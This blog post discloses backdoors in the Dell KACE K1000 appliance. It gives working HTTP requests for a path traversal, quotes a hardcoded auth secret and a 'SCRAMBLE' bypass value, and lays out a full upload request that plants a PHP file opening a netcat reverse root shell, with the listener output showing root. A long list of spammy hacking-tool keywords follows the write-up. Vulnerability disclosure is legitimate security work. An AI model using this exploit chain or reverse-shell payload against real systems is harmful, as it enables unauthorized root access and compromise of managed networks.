Sunday 30 August 2020

The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
http://targethost/service/kbot_upload.php
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").


The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
    http://targethost/service/tmp/db.php
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:


Related word


  1. Hacking Tools Github
  2. Tools For Hacker
  3. Hack Tools Mac
  4. Pentest Tools Alternative
  5. Hacking Tools Kit
  6. Hacking Tools Online
  7. Pentest Tools
  8. Hacker Tools
  9. Game Hacking
  10. Hacker Techniques Tools And Incident Handling
  11. Hackers Toolbox
  12. Install Pentest Tools Ubuntu
  13. Pentest Tools Free
  14. Pentest Tools For Ubuntu
  15. Pentest Tools Kali Linux
  16. Hak5 Tools
  17. Hack Tools Download
  18. Hacker Techniques Tools And Incident Handling
  19. Hack Apps
  20. Pentest Tools
  21. Hacker Tools For Ios
  22. Hacker Tools List
  23. Black Hat Hacker Tools
  24. Hacker Security Tools
  25. Hacker Tools Software
  26. Pentest Tools Kali Linux
  27. Hacker Tools For Ios
  28. Hacker Techniques Tools And Incident Handling
  29. Kik Hack Tools
  30. Hack Rom Tools
  31. Hacks And Tools
  32. Hacking Tools For Windows Free Download
  33. Pentest Tools Download
  34. Termux Hacking Tools 2019
  35. Hacker Tools Apk
  36. Hacking Tools For Games
  37. Hacker Tools For Windows
  38. Free Pentest Tools For Windows
  39. Hackrf Tools
  40. Best Hacking Tools 2020
  41. Hack Tools
  42. Pentest Tools Github
  43. Pentest Box Tools Download
  44. Hack Tools 2019
  45. Hacking Tools Download
  46. Hack Tools For Games
  47. Pentest Reporting Tools
  48. Hacking Tools Pc
  49. Pentest Tools For Android
  50. Hacking Tools And Software
  51. Pentest Tools Framework
  52. Hacking Tools For Beginners
  53. World No 1 Hacker Software
  54. Hacking Tools Hardware
  55. Hacking Tools For Beginners
  56. Pentest Tools Online
  57. Hack Tools
  58. Pentest Tools List
  59. Android Hack Tools Github
  60. Hack Tools Download
  61. Pentest Tools For Mac
  62. Hacker Tools Apk
  63. Pentest Automation Tools
  64. Tools 4 Hack
  65. Pentest Tools Download
  66. Hacking Tools Download
  67. Pentest Tools Port Scanner
  68. Pentest Tools Github
  69. Best Pentesting Tools 2018
  70. Nsa Hacker Tools
  71. Tools 4 Hack
  72. Hack Rom Tools
  73. Termux Hacking Tools 2019
  74. Hacking Tools Name
  75. Hacker Security Tools
  76. Pentest Tools For Android
  77. Pentest Tools Open Source
  78. Pentest Reporting Tools
  79. Hacking Tools For Kali Linux
  80. Tools For Hacker
  81. How To Install Pentest Tools In Ubuntu
  82. Android Hack Tools Github
  83. Hacker Tools Apk Download
  84. Hacker Tools Apk Download
  85. Pentest Tools For Windows
  86. Hacking Tools Windows
  87. Hack Tools
  88. Github Hacking Tools
  89. Pentest Recon Tools
  90. Pentest Tools Bluekeep
  91. Hack Tools Pc
  92. Free Pentest Tools For Windows
  93. Pentest Tools Framework
  94. Hacking Tools Free Download
  95. Hack Tools
  96. Nsa Hack Tools Download
  97. How To Hack
  98. Hacker Tools Hardware
  99. Hack Tool Apk
  100. Nsa Hack Tools
  101. Pentest Tools Tcp Port Scanner
  102. Pentest Tools Online
  103. What Is Hacking Tools
  104. Hacking Tools For Windows Free Download
  105. Install Pentest Tools Ubuntu
  106. Pentest Tools List
  107. Hacker Tools Apk Download
  108. Hacker Tools Free
  109. Pentest Tools Apk
  110. Hacker Tools 2020
  111. Hacker Tools Hardware
  112. Hacking Tools Pc
  113. Tools 4 Hack
  114. Hacker Tools For Mac
  115. Tools For Hacker
  116. Pentest Tools List
  117. Beginner Hacker Tools
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)